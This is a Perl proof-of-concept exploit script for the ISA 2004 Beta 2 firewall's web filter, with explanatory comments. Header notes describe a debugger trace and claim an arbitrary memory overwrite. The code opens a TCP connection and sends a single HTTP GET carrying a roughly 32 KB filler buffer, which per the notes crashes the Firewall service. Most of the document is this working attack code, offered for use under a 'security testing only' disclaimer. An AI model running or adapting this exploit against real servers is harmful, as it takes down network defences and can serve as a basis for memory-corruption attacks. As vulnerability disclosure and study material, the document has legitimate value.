#!/usr/bin/perl
#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
#
# ************************************************** !!! WARNING !!! ***********************************************************
# * FOR SECURITY TESTING ONLY! *
# ******************************************************************************************************************************
# * By using this code you agree that I make no warranties or representations, express or implied, about the *
# * accuracy, timeliness or completeness of this, including without limitations the implied warranties of *
# * merchantability and fitness for a particular purpose. *
# * I make NO warranty of non-infringement. This code may contain technical inaccuracies or typographical errors. *
# * This code can never be copyrighted or owned by any commercial company, under no circumstances whatsoever, *
# * but can be used for as long as the developer is giving explicit approval of the usage, and the user understands *
# * and approves of all the parts written in this notice. *
# * This program may NOT be used by any Danish company, unless explicit written permission from the developer. *
# * Neither myself nor any of my Affiliates shall be liable for any direct, incidental, consequential, indirect *
# * or punitive damages arising out of access to, inability to access, or any use of the content of this code, *
# * including without limitation any PC, other equipment or other property, even if I am expressly advised of *
# * the possibility of such damages. I DO NOT encourage criminal activities. If you use this code or commit *
# * criminal acts with it, then you are solely responsible for your own actions and by use, downloading, transferring, *
# * and/or reading anything from this code you are considered to have accepted the terms and conditions and have read *
# * this disclaimer.
# * Once again this code is for penetration testing purposes only. *
# ******************************************************************************************************************************
#
# Notes:
# The more complex our security becomes, the more complex our enemy's efforts must be. The more we seek to shut him out,
# the better he must learn to become at breaking in. Each new level of security that we manage becomes no more than a
# stepping stone for him who would surpass us, for he bases his next assault upon our best defenses.
#
#
# Tested on :
# - Windows 2000 Server SP4, latest patches
# - ISA 2004 Beta release 2
#
# The following 2 errors will end up in the event viewer:
# ------------------------------------------------------------------------
# Event Type: Error
# Event Source: Microsoft Firewall
# Event Category: None
# Event ID: 14057
# Description:
# The Firewall service stopped because an application
# filter module C:\Program Files\Microsoft ISA Server\w3filter.dll
# generated an exception code C0000005 in address 10012B1C when
# function CompleteAsyncIO was called. To resolve this error,
# remove recently installed application
# ------------------------------------------------------------------------
#
# ------------------------------------------------------------------------
# Event Type: Error
# Event Source: Microsoft ISA Server
# Event Category: None
# Event ID: 1000
# Description:
# Faulting application wspsrv.exe,
# version 4.0.1872.0, stamp 3fb2f88a, faulting module w3filter.dll,
# version 4.0.1872.0, stamp 3fb2f848, debug? 0, fault address 0x00012b1c.
#
# ------------------------------------------------------------------------
#
# Problem Seems to be When: (Default Settings)
# Maximum Header length : 32768
# Maximum URL Length : 10240
# Maximum query Length : 10240
#
# The gap between the 32768 and the sum of the two are 20480
# When requesting a string by the size 21000 to 32000 the Firewall DIE
#
# Since I own both EAX and ECX I have an arbitrary DWORD overwrite.
# I should be able to overwrite the data at any 32bit address with a
# 32bit value of my choosing.
#
# Address Stack Procedure / Arguments Called from
# 0207FCE0 78001532 ntdll.RtlAllocateHeap msvcrt.7800152C
#
# This is where the Debugger stops
# MOV DWORD PTR DS:[EDX],EAX
# Move EAX that is a DWORD to the address in ECX, and within the segment DS
#
# This is where ECX is overwritten
#
# This is where EAX is overwritten
# LEA EAX,DWORD PTR SS:[EBP-C]

# Script summary (what the code below actually does): it takes -target and
# -port, opens one TCP connection, sends a single HTTP GET whose query
# string is a ~32 KB filler buffer, closes the socket and exits. Per the
# notes above, on the tested beta build that request crashes the Firewall
# service (the two Event IDs listed in the header are the observable
# symptom), i.e. the demonstrated impact is a denial of service. Nothing in
# the script reads a response or verifies the outcome.

use IO::Socket;
use Getopt::Long;

my $host_header;
my $target = "127.0.0.1";
my $port = "80";

# Three 4-byte placeholder values (0x41414141, 0x42424242, 0x43434343)
# embedded in the middle of the filler. The names mirror the registers the
# debugger notes above say get overwritten; the values are markers only.
my $EAX = "\x41\x41\x41\x41";
my $ECX = "\x42\x42\x42\x42";
my $EDX = "\x43\x43\x43\x43";

# Query-string payload: 20154 + 3*4 + 11832 = 31998 bytes, which falls in
# the 21000-32000 range the notes above report as fatal. Note $buf is a
# package global (no "my"), as are $error, $host and $connection below.
$buf = join ("", "\x91" x 20154, $EAX, $ECX, $EDX, "\x90" x 11832);

# Command-line parsing; -help/-? prints the banner and usage and exits.
GetOptions(
    "target=s" => \$target,
    "port=i" => \$port,
    "help|?" => sub {
        print "\t #################################################\n";
        print "\t # ISA 2004, Beta 2 PoC Exploit #\n";
        print "\t # ************* !!! WARNING !!! ************ #\n";
        print "\t # ** FOR PRIVATE AND EDUCATIONAL USE ONLY! * #\n";
        print "\t # ****************************************** #\n";
        print "\t # (c)2004 by Dennis Rand #\n";
        print "\t #################################################\n";
        print "\n\t -target\t\t eg.: 127.0.0.1\n";
        print "\t -port\t\t\t eg.: 80\n\n";
        print "\tUsage eg.: isa2004_beta2.pl -t 127.0.0.1 -p 80\n";
        exit;
    }
);

# Both options default to non-empty values, so these checks only trigger
# when the caller explicitly passes an empty -target or a -port of 0.
$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a port number\n" if ((!$port));
if ($error) {
    print "Try isa2004_beta2.pl -help or -?' 
for more information.\n$error\n" ;
    exit;
}

# Fixed request headers appended after the request line in attack().
# The trailing "|| die" can never fire: join() always returns a non-empty
# string here, so the "Failed to connect" message on this line is dead
# code; connection failures are actually reported in Con().
$host_header = join ("", "Host: $target\r\n", "Accept: */*\r\n", "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)", "Content-Type: text/plain\r\n", "Connection: Close")|| die "[*] Failed to connect to $target port $port\n";

# Main: print a status banner and fire the single request.
if ($target) {
    print "\n" x 90;   # scrolls the terminal clear
    print "\n\n";
    $host = $target;   # assigned but never read anywhere in this script
    print "[-] Target system - ISA 2004 Beta release 2\n\n";
    print "[*] Target :\t\t\t $target\n";
    print "[*] Port :\t\t\t $port\n";
    print "[*] Total packet Size:\t\t ".length($buf)." Bytes\n";
    print "[*] Connecting To Target\t";
    attack();
};

# Con: open a TCP connection to $target:$port with a 3-second timeout and
# store the handle in the global $connection. Prints " DONE" on success;
# prints " FAILED" and terminates the whole process on failure, so callers
# never see an undefined $connection.
sub Con {
    $| = 1;   # unbuffered STDOUT so the status text appears immediately
    $connection = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $target, PeerPort => $port, Reuse => 1, Timeout => 3,);
    if(!$connection){print " FAILED\n";exit;}
    else {print " DONE\n";}
}

# attack: connect via Con(), write one GET request carrying $buf in the
# query string (the "Bye" parameter) followed by $host_header, close the
# socket and exit. No response is read.
sub attack {
    Con();
    $| = 1;
    print $connection "GET /?Bye=$buf HTTP/1.1\r\n$host_header\r\n\r\n";
    close $connection;
    print "[*] Exploit sent\n";
    exit;
};